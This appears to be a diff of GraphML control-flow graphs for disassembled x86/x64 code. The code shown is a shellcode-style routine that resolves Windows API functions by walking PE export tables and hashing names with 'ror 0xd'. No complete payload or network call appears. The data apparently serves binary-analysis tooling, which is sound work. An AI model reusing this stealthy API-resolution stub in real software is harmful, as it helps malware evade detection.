<edge source="block.0x1039:instruction.0x1040" target="block.0x1039:instruction.0x1043"/>
|
||||
<edge source="block.0x1039:instruction.0x1043" target="block.0x1039:instruction.0x1046"/>
|
||||
<edge source="block.0x1039:instruction.0x1046" target="block.0x1039:instruction.0x104c"/>
|
||||
</graph>
|
||||
</node>
|
||||
<node id="block.0x104b">
|
||||
<data key="address">0x104b</data>
|
||||
<node id="block.0x104e">
|
||||
<data key="address">0x104e</data>
|
||||
<data key="type">block</data>
|
||||
<graph edgedefault="directed">
|
||||
<data key="address">0x104b</data>
|
||||
<data key="address">0x104e</data>
|
||||
<data key="type">block</data>
|
||||
<node id="block.0x104b:instruction.0x104b">
|
||||
<data key="address">0x104b</data>
|
||||
<node id="block.0x104e:instruction.0x104e">
|
||||
<data key="address">0x104e</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">8b8088000000</data>
|
||||
<data key="instruction.source">mov eax, dword ptr [rax + 0x88]</data>
|
||||
</node>
|
||||
<node id="block.0x104b:instruction.0x1051">
|
||||
<data key="address">0x1051</data>
|
||||
<node id="block.0x104e:instruction.0x1054">
|
||||
<data key="address">0x1054</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">4885c0</data>
|
||||
<data key="instruction.source">test rax, rax</data>
|
||||
</node>
|
||||
<node id="block.0x104b:instruction.0x1054">
|
||||
<data key="address">0x1054</data>
|
||||
<node id="block.0x104e:instruction.0x1057">
|
||||
<data key="address">0x1057</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">7467</data>
|
||||
<data key="instruction.hex">7464</data>
|
||||
<data key="instruction.source">je 0x10bd</data>
|
||||
</node>
|
||||
<edge source="block.0x104b:instruction.0x104b" target="block.0x104b:instruction.0x1051"/>
|
||||
<edge source="block.0x104b:instruction.0x1051" target="block.0x104b:instruction.0x1054"/>
|
||||
<edge source="block.0x104e:instruction.0x104e" target="block.0x104e:instruction.0x1054"/>
|
||||
<edge source="block.0x104e:instruction.0x1054" target="block.0x104e:instruction.0x1057"/>
|
||||
</graph>
|
||||
</node>
|
||||
<node id="block.0x1056">
|
||||
<data key="address">0x1056</data>
|
||||
<node id="block.0x1059">
|
||||
<data key="address">0x1059</data>
|
||||
<data key="type">block</data>
|
||||
<graph edgedefault="directed">
|
||||
<data key="address">0x1056</data>
|
||||
<data key="address">0x1059</data>
|
||||
<data key="type">block</data>
|
||||
<node id="block.0x1056:instruction.0x1056">
|
||||
<data key="address">0x1056</data>
|
||||
<node id="block.0x1059:instruction.0x1059">
|
||||
<data key="address">0x1059</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">4801d0</data>
|
||||
<data key="instruction.source">add rax, rdx</data>
|
||||
</node>
|
||||
<node id="block.0x1056:instruction.0x1059">
|
||||
<data key="address">0x1059</data>
|
||||
<node id="block.0x1059:instruction.0x105c">
|
||||
<data key="address">0x105c</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">50</data>
|
||||
<data key="instruction.source">push rax</data>
|
||||
</node>
|
||||
<node id="block.0x1056:instruction.0x105a">
|
||||
<data key="address">0x105a</data>
|
||||
<node id="block.0x1059:instruction.0x105d">
|
||||
<data key="address">0x105d</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">8b4818</data>
|
||||
<data key="instruction.source">mov ecx, dword ptr [rax + 0x18]</data>
|
||||
</node>
|
||||
<node id="block.0x1056:instruction.0x105d">
|
||||
<data key="address">0x105d</data>
|
||||
<node id="block.0x1059:instruction.0x1060">
|
||||
<data key="address">0x1060</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">448b4020</data>
|
||||
<data key="instruction.source">mov r8d, dword ptr [rax + 0x20]</data>
|
||||
</node>
|
||||
<node id="block.0x1056:instruction.0x1061">
|
||||
<data key="address">0x1061</data>
|
||||
<node id="block.0x1059:instruction.0x1064">
|
||||
<data key="address">0x1064</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">4901d0</data>
|
||||
<data key="instruction.source">add r8, rdx</data>
|
||||
</node>
|
||||
<edge source="block.0x1056:instruction.0x1056" target="block.0x1056:instruction.0x1059"/>
|
||||
<edge source="block.0x1056:instruction.0x1056" target="block.0x1056:instruction.0x105a"/>
|
||||
<edge source="block.0x1056:instruction.0x1056" target="block.0x1056:instruction.0x105d"/>
|
||||
<edge source="block.0x1056:instruction.0x105d" target="block.0x1056:instruction.0x1061"/>
|
||||
<edge source="block.0x1059:instruction.0x1059" target="block.0x1059:instruction.0x105c"/>
|
||||
<edge source="block.0x1059:instruction.0x1059" target="block.0x1059:instruction.0x105d"/>
|
||||
<edge source="block.0x1059:instruction.0x1059" target="block.0x1059:instruction.0x1060"/>
|
||||
<edge source="block.0x1059:instruction.0x1060" target="block.0x1059:instruction.0x1064"/>
|
||||
</graph>
|
||||
</node>
|
||||
<node id="block.0x1064">
|
||||
<data key="address">0x1064</data>
|
||||
<node id="block.0x1067">
|
||||
<data key="address">0x1067</data>
|
||||
<data key="type">block</data>
|
||||
<graph edgedefault="directed">
|
||||
<data key="address">0x1064</data>
|
||||
<data key="address">0x1067</data>
|
||||
<data key="type">block</data>
|
||||
<node id="block.0x1064:instruction.0x1064">
|
||||
<data key="address">0x1064</data>
|
||||
<node id="block.0x1067:instruction.0x1067">
|
||||
<data key="address">0x1067</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">e356</data>
|
||||
<data key="instruction.hex">e353</data>
|
||||
<data key="instruction.source">jrcxz 0x10bc</data>
|
||||
</node>
|
||||
</graph>
|
||||
</node>
|
||||
<node id="block.0x1066">
|
||||
<data key="address">0x1066</data>
|
||||
<node id="block.0x1069">
|
||||
<data key="address">0x1069</data>
|
||||
<data key="type">block</data>
|
||||
<graph edgedefault="directed">
|
||||
<data key="address">0x1066</data>
|
||||
<data key="address">0x1069</data>
|
||||
<data key="type">block</data>
|
||||
<node id="block.0x1066:instruction.0x1066">
|
||||
<data key="address">0x1066</data>
|
||||
<node id="block.0x1069:instruction.0x1069">
|
||||
<data key="address">0x1069</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">48ffc9</data>
|
||||
<data key="instruction.source">dec rcx</data>
|
||||
</node>
|
||||
<node id="block.0x1066:instruction.0x1069">
|
||||
<data key="address">0x1069</data>
|
||||
<node id="block.0x1069:instruction.0x106c">
|
||||
<data key="address">0x106c</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">418b3488</data>
|
||||
<data key="instruction.source">mov esi, dword ptr [r8 + rcx*4]</data>
|
||||
</node>
|
||||
<node id="block.0x1066:instruction.0x106d">
|
||||
<data key="address">0x106d</data>
|
||||
<node id="block.0x1069:instruction.0x1070">
|
||||
<data key="address">0x1070</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">4801d6</data>
|
||||
<data key="instruction.source">add rsi, rdx</data>
|
||||
</node>
|
||||
<node id="block.0x1066:instruction.0x1070">
|
||||
<data key="address">0x1070</data>
|
||||
<node id="block.0x1069:instruction.0x1073">
|
||||
<data key="address">0x1073</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">4d31c9</data>
|
||||
<data key="instruction.source">xor r9, r9</data>
|
||||
<data key="instruction.hex">448b4c2408</data>
|
||||
<data key="instruction.source">mov r9d, dword ptr [rsp + 8]</data>
|
||||
</node>
|
||||
<edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x106d"/>
|
||||
<edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x1069"/>
|
||||
<edge source="block.0x1066:instruction.0x1069" target="block.0x1066:instruction.0x106d"/>
|
||||
<edge source="block.0x1069:instruction.0x1069" target="block.0x1069:instruction.0x1070"/>
|
||||
<edge source="block.0x1069:instruction.0x1069" target="block.0x1069:instruction.0x106c"/>
|
||||
<edge source="block.0x1069:instruction.0x106c" target="block.0x1069:instruction.0x1070"/>
|
||||
</graph>
|
||||
</node>
|
||||
<node id="block.0x1073">
|
||||
<data key="address">0x1073</data>
|
||||
<node id="block.0x1078">
|
||||
<data key="address">0x1078</data>
|
||||
<data key="type">block</data>
|
||||
<graph edgedefault="directed">
|
||||
<data key="address">0x1073</data>
|
||||
<data key="address">0x1078</data>
|
||||
<data key="type">block</data>
|
||||
<node id="block.0x1073:instruction.0x1073">
|
||||
<data key="address">0x1073</data>
|
||||
<node id="block.0x1078:instruction.0x1078">
|
||||
<data key="address">0x1078</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">4831c0</data>
|
||||
<data key="instruction.source">xor rax, rax</data>
|
||||
</node>
|
||||
<node id="block.0x1073:instruction.0x1076">
|
||||
<data key="address">0x1076</data>
|
||||
<node id="block.0x1078:instruction.0x107b">
|
||||
<data key="address">0x107b</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">ac</data>
|
||||
<data key="instruction.source">lodsb al, byte ptr [rsi]</data>
|
||||
</node>
|
||||
<node id="block.0x1073:instruction.0x1077">
|
||||
<data key="address">0x1077</data>
|
||||
<node id="block.0x1078:instruction.0x107c">
|
||||
<data key="address">0x107c</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">41c1c90d</data>
|
||||
<data key="instruction.source">ror r9d, 0xd</data>
|
||||
</node>
|
||||
<node id="block.0x1073:instruction.0x107b">
|
||||
<data key="address">0x107b</data>
|
||||
<node id="block.0x1078:instruction.0x1080">
|
||||
<data key="address">0x1080</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">4101c1</data>
|
||||
<data key="instruction.source">add r9d, eax</data>
|
||||
</node>
|
||||
<node id="block.0x1073:instruction.0x107e">
|
||||
<data key="address">0x107e</data>
|
||||
<node id="block.0x1078:instruction.0x1083">
|
||||
<data key="address">0x1083</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">38e0</data>
|
||||
<data key="instruction.source">cmp al, ah</data>
|
||||
</node>
|
||||
<node id="block.0x1073:instruction.0x1080">
|
||||
<data key="address">0x1080</data>
|
||||
<node id="block.0x1078:instruction.0x1085">
|
||||
<data key="address">0x1085</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">75f1</data>
|
||||
<data key="instruction.source">jne 0x1073</data>
|
||||
<data key="instruction.source">jne 0x1078</data>
|
||||
</node>
|
||||
<edge source="block.0x1073:instruction.0x1073" target="block.0x1073:instruction.0x1076"/>
|
||||
<edge source="block.0x1073:instruction.0x1073" target="block.0x1073:instruction.0x1077"/>
|
||||
<edge source="block.0x1073:instruction.0x1073" target="block.0x1073:instruction.0x107e"/>
|
||||
<edge source="block.0x1073:instruction.0x1076" target="block.0x1073:instruction.0x107b"/>
|
||||
<edge source="block.0x1073:instruction.0x1076" target="block.0x1073:instruction.0x107e"/>
|
||||
<edge source="block.0x1073:instruction.0x1077" target="block.0x1073:instruction.0x107b"/>
|
||||
<edge source="block.0x1073:instruction.0x1077" target="block.0x1073:instruction.0x1080"/>
|
||||
<edge source="block.0x1073:instruction.0x107b" target="block.0x1073:instruction.0x107e"/>
|
||||
<edge source="block.0x1073:instruction.0x107e" target="block.0x1073:instruction.0x1080"/>
|
||||
<edge source="block.0x1078:instruction.0x1078" target="block.0x1078:instruction.0x107b"/>
|
||||
<edge source="block.0x1078:instruction.0x1078" target="block.0x1078:instruction.0x107c"/>
|
||||
<edge source="block.0x1078:instruction.0x1078" target="block.0x1078:instruction.0x1083"/>
|
||||
<edge source="block.0x1078:instruction.0x107b" target="block.0x1078:instruction.0x1080"/>
|
||||
<edge source="block.0x1078:instruction.0x107b" target="block.0x1078:instruction.0x1083"/>
|
||||
<edge source="block.0x1078:instruction.0x107c" target="block.0x1078:instruction.0x1080"/>
|
||||
<edge source="block.0x1078:instruction.0x107c" target="block.0x1078:instruction.0x1085"/>
|
||||
<edge source="block.0x1078:instruction.0x1080" target="block.0x1078:instruction.0x1083"/>
|
||||
<edge source="block.0x1078:instruction.0x1083" target="block.0x1078:instruction.0x1085"/>
|
||||
</graph>
|
||||
</node>
|
||||
<node id="block.0x1082">
|
||||
<data key="address">0x1082</data>
|
||||
<node id="block.0x1087">
|
||||
<data key="address">0x1087</data>
|
||||
<data key="type">block</data>
|
||||
<graph edgedefault="directed">
|
||||
<data key="address">0x1082</data>
|
||||
<data key="address">0x1087</data>
|
||||
<data key="type">block</data>
|
||||
<node id="block.0x1082:instruction.0x1082">
|
||||
<data key="address">0x1082</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">4c034c2408</data>
|
||||
<data key="instruction.source">add r9, qword ptr [rsp + 8]</data>
|
||||
</node>
|
||||
<node id="block.0x1082:instruction.0x1087">
|
||||
<node id="block.0x1087:instruction.0x1087">
|
||||
<data key="address">0x1087</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">4539d1</data>
|
||||
<data key="instruction.source">cmp r9d, r10d</data>
|
||||
</node>
|
||||
<node id="block.0x1082:instruction.0x108a">
|
||||
<node id="block.0x1087:instruction.0x108a">
|
||||
<data key="address">0x108a</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">75d8</data>
|
||||
<data key="instruction.source">jne 0x1064</data>
|
||||
<data key="instruction.hex">75db</data>
|
||||
<data key="instruction.source">jne 0x1067</data>
|
||||
</node>
|
||||
<edge source="block.0x1082:instruction.0x1082" target="block.0x1082:instruction.0x1087"/>
|
||||
<edge source="block.0x1082:instruction.0x1087" target="block.0x1082:instruction.0x108a"/>
|
||||
<edge source="block.0x1087:instruction.0x1087" target="block.0x1087:instruction.0x108a"/>
|
||||
</graph>
|
||||
</node>
|
||||
<node id="block.0x108c">
|
||||
@@ -640,17 +633,17 @@
|
||||
</graph>
|
||||
</node>
|
||||
<edge source="block.0x1000" target="block.0x1017"/>
|
||||
<edge source="block.0x1017" target="block.0x1023"/>
|
||||
<edge source="block.0x1023" target="block.0x102b"/>
|
||||
<edge source="block.0x102b" target="block.0x102d"/>
|
||||
<edge source="block.0x102d" target="block.0x1036"/>
|
||||
<edge source="block.0x1036" target="block.0x104b"/>
|
||||
<edge source="block.0x104b" target="block.0x1056"/>
|
||||
<edge source="block.0x1056" target="block.0x1064"/>
|
||||
<edge source="block.0x1064" target="block.0x1066"/>
|
||||
<edge source="block.0x1066" target="block.0x1073"/>
|
||||
<edge source="block.0x1073" target="block.0x1082"/>
|
||||
<edge source="block.0x1082" target="block.0x108c"/>
|
||||
<edge source="block.0x1017" target="block.0x1026"/>
|
||||
<edge source="block.0x1026" target="block.0x102e"/>
|
||||
<edge source="block.0x102e" target="block.0x1030"/>
|
||||
<edge source="block.0x1030" target="block.0x1039"/>
|
||||
<edge source="block.0x1039" target="block.0x104e"/>
|
||||
<edge source="block.0x104e" target="block.0x1059"/>
|
||||
<edge source="block.0x1059" target="block.0x1067"/>
|
||||
<edge source="block.0x1067" target="block.0x1069"/>
|
||||
<edge source="block.0x1069" target="block.0x1078"/>
|
||||
<edge source="block.0x1078" target="block.0x1087"/>
|
||||
<edge source="block.0x1087" target="block.0x108c"/>
|
||||
<edge source="block.0x108c" target="block.0x10bc"/>
|
||||
<edge source="block.0x10bc" target="block.0x10bd"/>
|
||||
</graph>
|
||||
|
||||
@@ -69,492 +69,471 @@
|
||||
<node id="block.0x100f:instruction.0x1012">
|
||||
<data key="address">0x1012</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">0fb74a26</data>
|
||||
<data key="instruction.source">movzx ecx, word ptr [edx + 0x26]</data>
|
||||
<data key="instruction.hex">0fb74a24</data>
|
||||
<data key="instruction.source">movzx ecx, word ptr [edx + 0x24]</data>
|
||||
</node>
|
||||
<node id="block.0x100f:instruction.0x1016">
|
||||
<data key="address">0x1016</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">31ff</data>
|
||||
<data key="instruction.source">xor edi, edi</data>
|
||||
<data key="instruction.hex">bf00000000</data>
|
||||
<data key="instruction.source">mov edi, 0</data>
|
||||
</node>
|
||||
</graph>
|
||||
</node>
|
||||
<node id="block.0x1018">
|
||||
<data key="address">0x1018</data>
|
||||
<node id="block.0x101b">
|
||||
<data key="address">0x101b</data>
|
||||
<data key="type">block</data>
|
||||
<graph edgedefault="directed">
|
||||
<data key="address">0x1018</data>
|
||||
<data key="address">0x101b</data>
|
||||
<data key="type">block</data>
|
||||
<node id="block.0x1018:instruction.0x1018">
|
||||
<data key="address">0x1018</data>
|
||||
<node id="block.0x101b:instruction.0x101b">
|
||||
<data key="address">0x101b</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">31c0</data>
|
||||
<data key="instruction.source">xor eax, eax</data>
|
||||
</node>
|
||||
<node id="block.0x1018:instruction.0x101a">
|
||||
<data key="address">0x101a</data>
|
||||
<node id="block.0x101b:instruction.0x101d">
|
||||
<data key="address">0x101d</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">ac</data>
|
||||
<data key="instruction.source">lodsb al, byte ptr [esi]</data>
|
||||
</node>
|
||||
<node id="block.0x1018:instruction.0x101b">
|
||||
<data key="address">0x101b</data>
|
||||
<node id="block.0x101b:instruction.0x101e">
|
||||
<data key="address">0x101e</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">3c61</data>
|
||||
<data key="instruction.source">cmp al, 0x61</data>
|
||||
</node>
|
||||
<node id="block.0x1018:instruction.0x101d">
|
||||
<data key="address">0x101d</data>
|
||||
<node id="block.0x101b:instruction.0x1020">
|
||||
<data key="address">0x1020</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">7c02</data>
|
||||
<data key="instruction.source">jl 0x1021</data>
|
||||
<data key="instruction.source">jl 0x1024</data>
|
||||
</node>
|
||||
<edge source="block.0x1018:instruction.0x1018" target="block.0x1018:instruction.0x101a"/>
|
||||
<edge source="block.0x1018:instruction.0x101a" target="block.0x1018:instruction.0x101b"/>
|
||||
<edge source="block.0x1018:instruction.0x101b" target="block.0x1018:instruction.0x101d"/>
|
||||
<edge source="block.0x101b:instruction.0x101b" target="block.0x101b:instruction.0x101d"/>
|
||||
<edge source="block.0x101b:instruction.0x101d" target="block.0x101b:instruction.0x101e"/>
|
||||
<edge source="block.0x101b:instruction.0x101e" target="block.0x101b:instruction.0x1020"/>
|
||||
</graph>
|
||||
</node>
|
||||
<node id="block.0x101f">
|
||||
<data key="address">0x101f</data>
|
||||
<node id="block.0x1022">
|
||||
<data key="address">0x1022</data>
|
||||
<data key="type">block</data>
|
||||
<graph edgedefault="directed">
|
||||
<data key="address">0x101f</data>
|
||||
<data key="address">0x1022</data>
|
||||
<data key="type">block</data>
|
||||
<node id="block.0x101f:instruction.0x101f">
|
||||
<data key="address">0x101f</data>
|
||||
<node id="block.0x1022:instruction.0x1022">
|
||||
<data key="address">0x1022</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">2c20</data>
|
||||
<data key="instruction.source">sub al, 0x20</data>
|
||||
</node>
|
||||
</graph>
|
||||
</node>
|
||||
<node id="block.0x1021">
|
||||
<data key="address">0x1021</data>
|
||||
<node id="block.0x1024">
|
||||
<data key="address">0x1024</data>
|
||||
<data key="type">block</data>
|
||||
<graph edgedefault="directed">
|
||||
<data key="address">0x1021</data>
|
||||
<data key="address">0x1024</data>
|
||||
<data key="type">block</data>
|
||||
<node id="block.0x1021:instruction.0x1021">
|
||||
<data key="address">0x1021</data>
|
||||
<node id="block.0x1024:instruction.0x1024">
|
||||
<data key="address">0x1024</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">c1cf0d</data>
|
||||
<data key="instruction.source">ror edi, 0xd</data>
|
||||
</node>
|
||||
<node id="block.0x1021:instruction.0x1024">
|
||||
<data key="address">0x1024</data>
|
||||
<node id="block.0x1024:instruction.0x1027">
|
||||
<data key="address">0x1027</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">01c7</data>
|
||||
<data key="instruction.source">add edi, eax</data>
|
||||
</node>
|
||||
<node id="block.0x1021:instruction.0x1026">
|
||||
<data key="address">0x1026</data>
|
||||
<node id="block.0x1024:instruction.0x1029">
|
||||
<data key="address">0x1029</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">49</data>
|
||||
<data key="instruction.source">dec ecx</data>
|
||||
</node>
|
||||
<node id="block.0x1021:instruction.0x1027">
|
||||
<data key="address">0x1027</data>
|
||||
<node id="block.0x1024:instruction.0x102a">
|
||||
<data key="address">0x102a</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">75ef</data>
|
||||
<data key="instruction.source">jne 0x1018</data>
|
||||
<data key="instruction.source">jne 0x101b</data>
|
||||
</node>
|
||||
<edge source="block.0x1021:instruction.0x1021" target="block.0x1021:instruction.0x1024"/>
|
||||
<edge source="block.0x1021:instruction.0x1024" target="block.0x1021:instruction.0x1026"/>
|
||||
<edge source="block.0x1021:instruction.0x1026" target="block.0x1021:instruction.0x1027"/>
|
||||
<edge source="block.0x1024:instruction.0x1024" target="block.0x1024:instruction.0x1027"/>
|
||||
<edge source="block.0x1024:instruction.0x1027" target="block.0x1024:instruction.0x1029"/>
|
||||
<edge source="block.0x1024:instruction.0x1029" target="block.0x1024:instruction.0x102a"/>
|
||||
</graph>
|
||||
</node>
|
||||
<node id="block.0x1029">
|
||||
<data key="address">0x1029</data>
|
||||
<node id="block.0x102c">
|
||||
<data key="address">0x102c</data>
|
||||
<data key="type">block</data>
|
||||
<graph edgedefault="directed">
|
||||
<data key="address">0x1029</data>
|
||||
<data key="address">0x102c</data>
|
||||
<data key="type">block</data>
|
||||
<node id="block.0x1029:instruction.0x1029">
|
||||
<data key="address">0x1029</data>
|
||||
<node id="block.0x102c:instruction.0x102c">
|
||||
<data key="address">0x102c</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">52</data>
|
||||
<data key="instruction.source">push edx</data>
|
||||
</node>
|
||||
<node id="block.0x1029:instruction.0x102a">
|
||||
<data key="address">0x102a</data>
|
||||
<node id="block.0x102c:instruction.0x102d">
|
||||
<data key="address">0x102d</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">57</data>
|
||||
<data key="instruction.source">push edi</data>
|
||||
</node>
|
||||
<node id="block.0x1029:instruction.0x102b">
|
||||
<data key="address">0x102b</data>
|
||||
<node id="block.0x102c:instruction.0x102e">
|
||||
<data key="address">0x102e</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">8b5210</data>
|
||||
<data key="instruction.source">mov edx, dword ptr [edx + 0x10]</data>
|
||||
</node>
|
||||
<node id="block.0x1029:instruction.0x102e">
|
||||
<data key="address">0x102e</data>
|
||||
<node id="block.0x102c:instruction.0x1031">
|
||||
<data key="address">0x1031</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">8b423c</data>
|
||||
<data key="instruction.source">mov eax, dword ptr [edx + 0x3c]</data>
|
||||
</node>
|
||||
<node id="block.0x1029:instruction.0x1031">
|
||||
<data key="address">0x1031</data>
|
||||
<node id="block.0x102c:instruction.0x1034">
|
||||
<data key="address">0x1034</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">01d0</data>
|
||||
<data key="instruction.source">add eax, edx</data>
|
||||
</node>
|
||||
<node id="block.0x1029:instruction.0x1033">
|
||||
<data key="address">0x1033</data>
|
||||
<node id="block.0x102c:instruction.0x1036">
|
||||
<data key="address">0x1036</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">8b4078</data>
|
||||
<data key="instruction.source">mov eax, dword ptr [eax + 0x78]</data>
|
||||
</node>
|
||||
<node id="block.0x1029:instruction.0x1036">
|
||||
<data key="address">0x1036</data>
|
||||
<node id="block.0x102c:instruction.0x1039">
|
||||
<data key="address">0x1039</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">85c0</data>
|
||||
<data key="instruction.source">test eax, eax</data>
|
||||
</node>
|
||||
<node id="block.0x1029:instruction.0x1038">
|
||||
<data key="address">0x1038</data>
|
||||
<node id="block.0x102c:instruction.0x103b">
|
||||
<data key="address">0x103b</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">744c</data>
|
||||
<data key="instruction.source">je 0x1086</data>
|
||||
<data key="instruction.hex">744a</data>
|
||||
<data key="instruction.source">je 0x1087</data>
|
||||
</node>
|
||||
<edge source="block.0x1029:instruction.0x1029" target="block.0x1029:instruction.0x102a"/>
|
||||
<edge source="block.0x1029:instruction.0x1029" target="block.0x1029:instruction.0x102b"/>
|
||||
<edge source="block.0x1029:instruction.0x102a" target="block.0x1029:instruction.0x1038"/>
|
||||
<edge source="block.0x1029:instruction.0x102b" target="block.0x1029:instruction.0x102e"/>
|
||||
<edge source="block.0x1029:instruction.0x102b" target="block.0x1029:instruction.0x1031"/>
|
||||
<edge source="block.0x1029:instruction.0x102e" target="block.0x1029:instruction.0x1031"/>
|
||||
<edge source="block.0x1029:instruction.0x1031" target="block.0x1029:instruction.0x1033"/>
|
||||
<edge source="block.0x1029:instruction.0x1033" target="block.0x1029:instruction.0x1036"/>
|
||||
<edge source="block.0x1029:instruction.0x1036" target="block.0x1029:instruction.0x1038"/>
|
||||
<edge source="block.0x102c:instruction.0x102c" target="block.0x102c:instruction.0x102d"/>
|
||||
<edge source="block.0x102c:instruction.0x102c" target="block.0x102c:instruction.0x102e"/>
|
||||
<edge source="block.0x102c:instruction.0x102d" target="block.0x102c:instruction.0x103b"/>
|
||||
<edge source="block.0x102c:instruction.0x102e" target="block.0x102c:instruction.0x1031"/>
|
||||
<edge source="block.0x102c:instruction.0x102e" target="block.0x102c:instruction.0x1034"/>
|
||||
<edge source="block.0x102c:instruction.0x1031" target="block.0x102c:instruction.0x1034"/>
|
||||
<edge source="block.0x102c:instruction.0x1034" target="block.0x102c:instruction.0x1036"/>
|
||||
<edge source="block.0x102c:instruction.0x1036" target="block.0x102c:instruction.0x1039"/>
|
||||
<edge source="block.0x102c:instruction.0x1039" target="block.0x102c:instruction.0x103b"/>
|
||||
</graph>
|
||||
</node>
|
||||
<node id="block.0x103a">
|
||||
<data key="address">0x103a</data>
|
||||
<node id="block.0x103d">
|
||||
<data key="address">0x103d</data>
|
||||
<data key="type">block</data>
|
||||
<graph edgedefault="directed">
|
||||
<data key="address">0x103a</data>
|
||||
<data key="address">0x103d</data>
|
||||
<data key="type">block</data>
|
||||
<node id="block.0x103a:instruction.0x103a">
|
||||
<data key="address">0x103a</data>
|
||||
<node id="block.0x103d:instruction.0x103d">
|
||||
<data key="address">0x103d</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">01d0</data>
|
||||
<data key="instruction.source">add eax, edx</data>
|
||||
</node>
|
||||
<node id="block.0x103a:instruction.0x103c">
|
||||
<data key="address">0x103c</data>
|
||||
<node id="block.0x103d:instruction.0x103f">
|
||||
<data key="address">0x103f</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">50</data>
|
||||
<data key="instruction.source">push eax</data>
|
||||
</node>
|
||||
<node id="block.0x103a:instruction.0x103d">
|
||||
<data key="address">0x103d</data>
|
||||
<node id="block.0x103d:instruction.0x1040">
|
||||
<data key="address">0x1040</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">8b4818</data>
|
||||
<data key="instruction.source">mov ecx, dword ptr [eax + 0x18]</data>
|
||||
</node>
|
||||
<node id="block.0x103a:instruction.0x1040">
|
||||
<data key="address">0x1040</data>
|
||||
<node id="block.0x103d:instruction.0x1043">
|
||||
<data key="address">0x1043</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">8b5820</data>
|
||||
<data key="instruction.source">mov ebx, dword ptr [eax + 0x20]</data>
|
||||
</node>
|
||||
<node id="block.0x103a:instruction.0x1043">
|
||||
<data key="address">0x1043</data>
|
||||
<node id="block.0x103d:instruction.0x1046">
|
||||
<data key="address">0x1046</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">01d3</data>
|
||||
<data key="instruction.source">add ebx, edx</data>
|
||||
</node>
|
||||
<edge source="block.0x103a:instruction.0x103a" target="block.0x103a:instruction.0x103c"/>
|
||||
<edge source="block.0x103a:instruction.0x103a" target="block.0x103a:instruction.0x103d"/>
|
||||
<edge source="block.0x103a:instruction.0x103a" target="block.0x103a:instruction.0x1040"/>
|
||||
<edge source="block.0x103a:instruction.0x1040" target="block.0x103a:instruction.0x1043"/>
|
||||
<edge source="block.0x103d:instruction.0x103d" target="block.0x103d:instruction.0x103f"/>
|
||||
<edge source="block.0x103d:instruction.0x103d" target="block.0x103d:instruction.0x1040"/>
|
||||
<edge source="block.0x103d:instruction.0x103d" target="block.0x103d:instruction.0x1043"/>
|
||||
<edge source="block.0x103d:instruction.0x1043" target="block.0x103d:instruction.0x1046"/>
|
||||
</graph>
|
||||
</node>
|
||||
<node id="block.0x1045">
|
||||
<data key="address">0x1045</data>
|
||||
<node id="block.0x1048">
|
||||
<data key="address">0x1048</data>
|
||||
<data key="type">block</data>
|
||||
<graph edgedefault="directed">
|
||||
<data key="address">0x1045</data>
|
||||
<data key="address">0x1048</data>
|
||||
<data key="type">block</data>
|
||||
<node id="block.0x1045:instruction.0x1045">
|
||||
<data key="address">0x1045</data>
|
||||
<node id="block.0x1048:instruction.0x1048">
|
||||
<data key="address">0x1048</data>
|
||||
<data key="type">instruction</data>
|
||||
<data key="instruction.hex">85c9</data>
|
||||
<data key="instruction.source">test ecx, ecx</data>
|
||||
</node>
|
||||
<node id="block.0x1045:instruction.0x1047">
|
||||
<data key="address">0x1047</data>
|
||||
